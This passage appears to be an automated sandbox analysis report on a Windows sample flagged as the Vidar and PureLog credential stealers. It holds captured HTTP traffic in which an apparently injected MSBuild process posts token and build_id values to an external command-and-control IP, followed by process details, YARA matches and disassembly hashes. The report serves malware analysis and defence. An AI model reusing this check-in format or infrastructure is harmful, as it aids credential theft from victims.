                                                                                                                                                                                                                                                                          2024-04-20 12:28:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 46 43 41 4b 45 48 44 48 44 48 49 44 48 44 47 44 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------CBAFCAKEHDHDHIDHDGDHContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------CBAFCAKEHDHDHIDHDGDHCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.44976037.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:44 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJE
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:44 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------JDHCBAEHJJJKKFIDGHJECont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:45 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:14:27:55
                                                                                                                                                                                                                                                                          Start date:20/04/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe"
                                                                                                                                                                                                                                                                          Imagebase:0xb00000
                                                                                                                                                                                                                                                                          File size:2'952'808 bytes
                                                                                                                                                                                                                                                                          MD5 hash:7F1E688E77760AD29C560404A2FB9D2F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:14:28:06
                                                                                                                                                                                                                                                                          Start date:20/04/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x9b0000
                                                                                                                                                                                                                                                                          File size:262'432 bytes
                                                                                                                                                                                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 05852D20 Relevance: 16.1, Strings: 12, Instructions: 1097COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ,oq$4$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-1127353760
                                                                                                                                                                                                                                                                            • Opcode ID: 35c7f8c9e5bc1808b7927258d86821e1318baf0c2626551dc61d6b82ad87dfa9
                                                                                                                                                                                                                                                                            • Instruction ID: 1df5ea5a35d1ae218732c136743736e2ed6ef15b43e8ec1953bef0ac423e1635
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35c7f8c9e5bc1808b7927258d86821e1318baf0c2626551dc61d6b82ad87dfa9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5B2F834A002188FDB14CFA9C994BADB7B6BF48350F1485A9E906EB3A5CB74DC85CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05853047 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ,oq$4$$kq$$kq$$kq$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-569362799
                                                                                                                                                                                                                                                                            • Opcode ID: 8e76f2a531a32e14070c3e7b964dd10a10f2903ea95bf13a6e6ec5151d724c47
                                                                                                                                                                                                                                                                            • Instruction ID: d3307fec757b55972ed21c8602a13c826cd789523fd4589fec1bf103b19372a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e76f2a531a32e14070c3e7b964dd10a10f2903ea95bf13a6e6ec5151d724c47
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B22E834A00218CFDB24DF64C994BA9B7B6BB48350F1485A9ED0AEB2A5DB309D85CF50
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0571B988 Relevance: 3.6, Strings: 2, Instructions: 1081COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758075813.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5710000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 2$$kq
                                                                                                                                                                                                                                                                            • API String ID: 0-2649369545
                                                                                                                                                                                                                                                                            • Opcode ID: 6ca12bbdaff3805c35635adeacfd86292e9048ccace26651631d09f94d65cf63
                                                                                                                                                                                                                                                                            • Instruction ID: 899b63e00ce6f7cff9a9947d3234c442d0dd3e00b5ec65cab5978fe23fbf1bab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ca12bbdaff3805c35635adeacfd86292e9048ccace26651631d09f94d65cf63
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80C2B4B4A41229CFCB65CF69C984B99BBB6FF88300F1081E9D909A7355DB349E85CF44
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F8391 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-2319236580
                                                                                                                                                                                                                                                                            • Opcode ID: 3a985882682649092e1c8fe32bb6ff9e37b7d0c93765b7b2252bb049429c92c2
                                                                                                                                                                                                                                                                            • Instruction ID: d91ee6127686d2f8ee0f32b69b8b84016eb0ba3a7f4c4e397596cb96a5b5db74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a985882682649092e1c8fe32bb6ff9e37b7d0c93765b7b2252bb049429c92c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89C12574E05208CFDB14CFA9D884BADBBF2BF89304F248069E519A7352DB759A85DF01
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 057F83A0 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758672744.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-2319236580
                                                                                                                                                                                                                                                                            • Opcode ID: 6e778c3388cddd830f048a380a8bf51314ad9c72840508e402abc0638b8fd3ba
                                                                                                                                                                                                                                                                            • Instruction ID: 931dbc36eea55afe6b608798c3a74e1f7c451e60ee7f1172754b14d40ecbc6db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e778c3388cddd830f048a380a8bf51314ad9c72840508e402abc0638b8fd3ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EB13474E05208CFDB14CFA9C894BADBBF2BB89300F248069E519A7352DB759985DF01
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05858EE8 Relevance: 4.2, Strings: 3, Instructions: 436COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hoq$Hoq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3310881576
                                                                                                                                                                                                                                                                            • Opcode ID: 90101da09ae241525fd1cfd7473cc3b5bfb7e8d6c9e448a684720f8045b7cb9b
                                                                                                                                                                                                                                                                            • Instruction ID: b1e0713337f62785f8394d28130a37175e5cac61c62c8ba6b6e01f636b00a450
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90101da09ae241525fd1cfd7473cc3b5bfb7e8d6c9e448a684720f8045b7cb9b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4021930A00605CFCB25DFA5C484AAEBBF6FF88310F54852DE9069B3A5DB35AC46CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0585ABA8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 4'kq$4'kq$4'kq
                                                                                                                                                                                                                                                                            • API String ID: 0-2478202913
                                                                                                                                                                                                                                                                            • Opcode ID: 0227612c005f6ec783abcc1cb3242e4e49b2d73de6ae2e5486ea9f280ca96d5a
                                                                                                                                                                                                                                                                            • Instruction ID: f19b948c1a9d21e2c2374afad319093ea98db0febf3282c300b10621453828b1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0227612c005f6ec783abcc1cb3242e4e49b2d73de6ae2e5486ea9f280ca96d5a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4F1DD34B10218CFCB08DFA4D598A9DBBB2FF88311F558158E906AB3A5DB71EC46CB41
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0585F180 Relevance: 4.1, Strings: 3, Instructions: 360COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (oq$(oq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3836682603
                                                                                                                                                                                                                                                                            • Opcode ID: 7ccf162dc3e9cc8194dc2101efdcb7f70341051c52c7a123c21256b92a1e88c5
                                                                                                                                                                                                                                                                            • Instruction ID: 46178cccb241b3c0d2e857acc1b8d026ee10db1de901c1c65592fb9129157373
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ccf162dc3e9cc8194dc2101efdcb7f70341051c52c7a123c21256b92a1e88c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60E1FD34A00209DFCB04EF68D4949AEBBB2FF89311F558569ED06AB364DB30ED45CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D8310 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8pq$Tekq
                                                                                                                                                                                                                                                                            • API String ID: 0-3749742652
                                                                                                                                                                                                                                                                            • Opcode ID: 94fed2409b9ac665538529fe75ea3d887d411ed8ee15eaf5ba1be9285b9ccb91
                                                                                                                                                                                                                                                                            • Instruction ID: e4fe4a8f38c680de4d1a52ccc9c8a87cd5d4cd693972665cf000f20181964c11
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94fed2409b9ac665538529fe75ea3d887d411ed8ee15eaf5ba1be9285b9ccb91
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CF15434A00209DFDB15CB68D984B6ABBB2FF4A304F158469E406DB3A5DB34EE85CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05859730 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                                                                                            • Opcode ID: f0d409dcedb76d3db5d25de5640e2696015765ab10725235cef88f6308d6ee77
                                                                                                                                                                                                                                                                            • Instruction ID: 334f245ede9e00cee57e20c46a0f3d70cab992380c207b2fb1f588b48412c8d7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0d409dcedb76d3db5d25de5640e2696015765ab10725235cef88f6308d6ee77
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95D18B30600619DFCB05DF29C480A6EBBB6FF88354F558569E80ADB3A5DB34EC45CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D6948 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d%qq$d%qq
                                                                                                                                                                                                                                                                            • API String ID: 0-1943325001
                                                                                                                                                                                                                                                                            • Opcode ID: 5eb90eaf2d032813793b57a6c200295ba86ef99d3367e4d718e44e771a3b8613
                                                                                                                                                                                                                                                                            • Instruction ID: c188e039d099e657f30ce1cb2a5bd04792a1392b1fb72f952575dd2e67678933
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb90eaf2d032813793b57a6c200295ba86ef99d3367e4d718e44e771a3b8613
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6619030B0431DDFDB04DA69C950BAE77A6FF88704F208469E006EF3A4EA79DD458B95
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 018D6939 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1750503753.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d%qq$d%qq
                                                                                                                                                                                                                                                                            • API String ID: 0-1943325001
                                                                                                                                                                                                                                                                            • Opcode ID: 8bdc619c8ee75d1af2cb1020ad43635aed4f1b8a5e98f749863c624de1b0236a
                                                                                                                                                                                                                                                                            • Instruction ID: 3357cfc4306ffc68bc1a73e504390d8496cb649a809af3842a01cc5b0cf5bf39
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bdc619c8ee75d1af2cb1020ad43635aed4f1b8a5e98f749863c624de1b0236a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C61B270B0031DDFDB049B78C850BAE77A6FB88704F208469E002EF3A5EA79DD458B91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 05854A08 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1758812721.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5850000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (oq$Hoq
                                                                                                                                                                                                                                                                            • API String ID: 0-3084834809
                                                                                                                                                                                                                                                                            • Opcode ID: 885cbf97fa171c1a82d8a256f81658985f6c9dd51a0b567662e5ea35d590f8aa
                                                                                                                                                                                                                                                                            • Instruction ID: 3e89732f07e3801f6caedd0c5fc6cc65c90f926950a57cfc325a1f61d4d7efbf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 885cbf97fa171c1a82d8a256f81658985f6c9dd51a0b567662e5ea35d590f8aa
